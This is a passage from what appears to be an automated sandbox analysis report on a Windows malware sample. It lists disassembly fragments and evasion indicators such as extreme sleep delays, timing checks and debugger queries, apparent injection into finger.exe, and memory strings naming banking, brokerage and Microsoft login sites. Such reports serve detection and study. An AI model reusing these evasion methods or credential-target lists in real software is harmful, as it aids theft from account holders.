                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DC1436 push ebp; retf 0_2_04DC1446
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DC1310 push ebp; retf 0_2_04DC131E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DC1E97 push ebp; retf 0_2_04DC1EA6
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 0_2_04DC5860 pushfd ; retf 0_2_04DC586A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0041E877 push es; ret 6_2_0041E82F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00416163 pusha ; iretd 6_2_004160B8
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00403110 push eax; ret 6_2_00403112
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0040D1E1 push edx; retf 6_2_0040D1EB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0041427A push esp; ret 6_2_00414347
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00414222 push esp; ret 6_2_00414347
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0040D2E0 push edi; retf 6_2_0040D2E4
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0041435B push esp; ret 6_2_00414347
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00401D02 push ss; iretd 6_2_00401D04
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00418D36 push ds; iretd 6_2_00418D3C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00414587 push edi; ret 6_2_0041459C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00414593 push edi; ret 6_2_0041459C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00416626 push eax; ret 6_2_004166A4
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00415ED3 pusha ; iretd 6_2_004160B8
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0041177F pushfd ; ret 6_2_00411786
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0041E7E5 push es; ret 6_2_0041E82F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00423783 push edi; iretd 6_2_0042378E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011809AD push ecx; mov dword ptr [esp], ecx6_2_011809B6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_02FE09AD push ecx; mov dword ptr [esp], ecx8_2_02FE09B6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0060C47D push cs; ret 8_2_0060C4A1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0061066A push edi; iretd 8_2_0061067B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_00610670 push edi; iretd 8_2_0061067B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_005FE66C pushfd ; ret 8_2_005FE673
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_00602DC0 pusha ; iretd 8_2_00602FA5
                Source: 72STaC6BmljfbIQ.exeStatic PE information: section name: .text entropy: 7.812825640175082
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\finger.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: 72STaC6BmljfbIQ.exe PID: 7760, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMemory allocated: 25C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMemory allocated: 7690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMemory allocated: 6EA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMemory allocated: 8690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMemory allocated: 9690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C096E rdtsc 6_2_011C096E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\finger.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe TID: 7780Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\finger.exe TID: 6408Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exe TID: 6408Thread sleep time: -72000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe TID: 3016Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe TID: 3016Thread sleep time: -31500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0060C7B0 FindFirstFileW,FindNextFileW,FindClose,8_2_0060C7B0
                Source: 40F193-3PQ.8.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: discord.comVMware20,11696494690f
                Source: 40F193-3PQ.8.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: 40F193-3PQ.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 40F193-3PQ.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: finger.exe, 00000008.00000002.3274267140.0000000007AE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690/
                Source: 40F193-3PQ.8.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 40F193-3PQ.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 40F193-3PQ.8.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 40F193-3PQ.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 40F193-3PQ.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 40F193-3PQ.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 40F193-3PQ.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: finger.exe, 00000008.00000002.3269614249.0000000002B5E000.00000004.00000020.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3269957179.000000000066F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 40F193-3PQ.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: 40F193-3PQ.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 40F193-3PQ.8.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: 40F193-3PQ.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: 40F193-3PQ.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: 40F193-3PQ.8.drBinary or memory string: global block list test formVMware20,11696494690
                Source: firefox.exe, 0000000D.00000002.2226961412.0000017A8743C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99 VP
                Source: 40F193-3PQ.8.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 40F193-3PQ.8.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 40F193-3PQ.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 40F193-3PQ.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 40F193-3PQ.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 40F193-3PQ.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 40F193-3PQ.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C096E rdtsc 6_2_011C096E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_00417813 LdrLoadDll,6_2_00417813
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A245A mov eax, dword ptr fs:[00000030h]6_2_011A245A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120C460 mov ecx, dword ptr fs:[00000030h]6_2_0120C460
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117645D mov eax, dword ptr fs:[00000030h]6_2_0117645D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BE443 mov eax, dword ptr fs:[00000030h]6_2_011BE443
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AA470 mov eax, dword ptr fs:[00000030h]6_2_011AA470
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AA470 mov eax, dword ptr fs:[00000030h]6_2_011AA470
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AA470 mov eax, dword ptr fs:[00000030h]6_2_011AA470
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120A4B0 mov eax, dword ptr fs:[00000030h]6_2_0120A4B0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B44B0 mov ecx, dword ptr fs:[00000030h]6_2_011B44B0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011864AB mov eax, dword ptr fs:[00000030h]6_2_011864AB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011804E5 mov ecx, dword ptr fs:[00000030h]6_2_011804E5
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180710 mov eax, dword ptr fs:[00000030h]6_2_01180710
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B0710 mov eax, dword ptr fs:[00000030h]6_2_011B0710
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BC700 mov eax, dword ptr fs:[00000030h]6_2_011BC700
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B273C mov eax, dword ptr fs:[00000030h]6_2_011B273C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B273C mov ecx, dword ptr fs:[00000030h]6_2_011B273C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B273C mov eax, dword ptr fs:[00000030h]6_2_011B273C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FC730 mov eax, dword ptr fs:[00000030h]6_2_011FC730
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BC720 mov eax, dword ptr fs:[00000030h]6_2_011BC720
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BC720 mov eax, dword ptr fs:[00000030h]6_2_011BC720
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180750 mov eax, dword ptr fs:[00000030h]6_2_01180750
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2750 mov eax, dword ptr fs:[00000030h]6_2_011C2750
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2750 mov eax, dword ptr fs:[00000030h]6_2_011C2750
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B674D mov esi, dword ptr fs:[00000030h]6_2_011B674D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B674D mov eax, dword ptr fs:[00000030h]6_2_011B674D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B674D mov eax, dword ptr fs:[00000030h]6_2_011B674D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01188770 mov eax, dword ptr fs:[00000030h]6_2_01188770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190770 mov eax, dword ptr fs:[00000030h]6_2_01190770
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01204755 mov eax, dword ptr fs:[00000030h]6_2_01204755
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120E75D mov eax, dword ptr fs:[00000030h]6_2_0120E75D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122678E mov eax, dword ptr fs:[00000030h]6_2_0122678E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011807AF mov eax, dword ptr fs:[00000030h]6_2_011807AF
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120E7E1 mov eax, dword ptr fs:[00000030h]6_2_0120E7E1
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118C7C0 mov eax, dword ptr fs:[00000030h]6_2_0118C7C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011847FB mov eax, dword ptr fs:[00000030h]6_2_011847FB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011847FB mov eax, dword ptr fs:[00000030h]6_2_011847FB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012007C3 mov eax, dword ptr fs:[00000030h]6_2_012007C3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A27ED mov eax, dword ptr fs:[00000030h]6_2_011A27ED
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A27ED mov eax, dword ptr fs:[00000030h]6_2_011A27ED
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A27ED mov eax, dword ptr fs:[00000030h]6_2_011A27ED
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C2619 mov eax, dword ptr fs:[00000030h]6_2_011C2619
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119260B mov eax, dword ptr fs:[00000030h]6_2_0119260B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119260B mov eax, dword ptr fs:[00000030h]6_2_0119260B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119260B mov eax, dword ptr fs:[00000030h]6_2_0119260B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119260B mov eax, dword ptr fs:[00000030h]6_2_0119260B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119260B mov eax, dword ptr fs:[00000030h]6_2_0119260B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119260B mov eax, dword ptr fs:[00000030h]6_2_0119260B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119260B mov eax, dword ptr fs:[00000030h]6_2_0119260B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE609 mov eax, dword ptr fs:[00000030h]6_2_011FE609
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118262C mov eax, dword ptr fs:[00000030h]6_2_0118262C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B6620 mov eax, dword ptr fs:[00000030h]6_2_011B6620
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B8620 mov eax, dword ptr fs:[00000030h]6_2_011B8620
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119E627 mov eax, dword ptr fs:[00000030h]6_2_0119E627
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124866E mov eax, dword ptr fs:[00000030h]6_2_0124866E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124866E mov eax, dword ptr fs:[00000030h]6_2_0124866E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119C640 mov eax, dword ptr fs:[00000030h]6_2_0119C640
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B2674 mov eax, dword ptr fs:[00000030h]6_2_011B2674
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA660 mov eax, dword ptr fs:[00000030h]6_2_011BA660
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA660 mov eax, dword ptr fs:[00000030h]6_2_011BA660
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01184690 mov eax, dword ptr fs:[00000030h]6_2_01184690
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01184690 mov eax, dword ptr fs:[00000030h]6_2_01184690
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B66B0 mov eax, dword ptr fs:[00000030h]6_2_011B66B0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BC6A6 mov eax, dword ptr fs:[00000030h]6_2_011BC6A6
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012006F1 mov eax, dword ptr fs:[00000030h]6_2_012006F1
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012006F1 mov eax, dword ptr fs:[00000030h]6_2_012006F1
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA6C7 mov ebx, dword ptr fs:[00000030h]6_2_011BA6C7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BA6C7 mov eax, dword ptr fs:[00000030h]6_2_011BA6C7
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE6F2 mov eax, dword ptr fs:[00000030h]6_2_011FE6F2
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE6F2 mov eax, dword ptr fs:[00000030h]6_2_011FE6F2
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE6F2 mov eax, dword ptr fs:[00000030h]6_2_011FE6F2
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE6F2 mov eax, dword ptr fs:[00000030h]6_2_011FE6F2
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120892A mov eax, dword ptr fs:[00000030h]6_2_0120892A
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0121892B mov eax, dword ptr fs:[00000030h]6_2_0121892B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01178918 mov eax, dword ptr fs:[00000030h]6_2_01178918
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01178918 mov eax, dword ptr fs:[00000030h]6_2_01178918
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE908 mov eax, dword ptr fs:[00000030h]6_2_011FE908
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FE908 mov eax, dword ptr fs:[00000030h]6_2_011FE908
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120C912 mov eax, dword ptr fs:[00000030h]6_2_0120C912
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01224978 mov eax, dword ptr fs:[00000030h]6_2_01224978
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01224978 mov eax, dword ptr fs:[00000030h]6_2_01224978
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120C97C mov eax, dword ptr fs:[00000030h]6_2_0120C97C
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01200946 mov eax, dword ptr fs:[00000030h]6_2_01200946
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C096E mov eax, dword ptr fs:[00000030h]6_2_011C096E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C096E mov edx, dword ptr fs:[00000030h]6_2_011C096E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011C096E mov eax, dword ptr fs:[00000030h]6_2_011C096E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A6962 mov eax, dword ptr fs:[00000030h]6_2_011A6962
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A6962 mov eax, dword ptr fs:[00000030h]6_2_011A6962
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A6962 mov eax, dword ptr fs:[00000030h]6_2_011A6962
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012089B3 mov esi, dword ptr fs:[00000030h]6_2_012089B3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012089B3 mov eax, dword ptr fs:[00000030h]6_2_012089B3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_012089B3 mov eax, dword ptr fs:[00000030h]6_2_012089B3
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011809AD mov eax, dword ptr fs:[00000030h]6_2_011809AD
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011809AD mov eax, dword ptr fs:[00000030h]6_2_011809AD
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011929A0 mov eax, dword ptr fs:[00000030h]6_2_011929A0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120E9E0 mov eax, dword ptr fs:[00000030h]6_2_0120E9E0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118A9D0 mov eax, dword ptr fs:[00000030h]6_2_0118A9D0
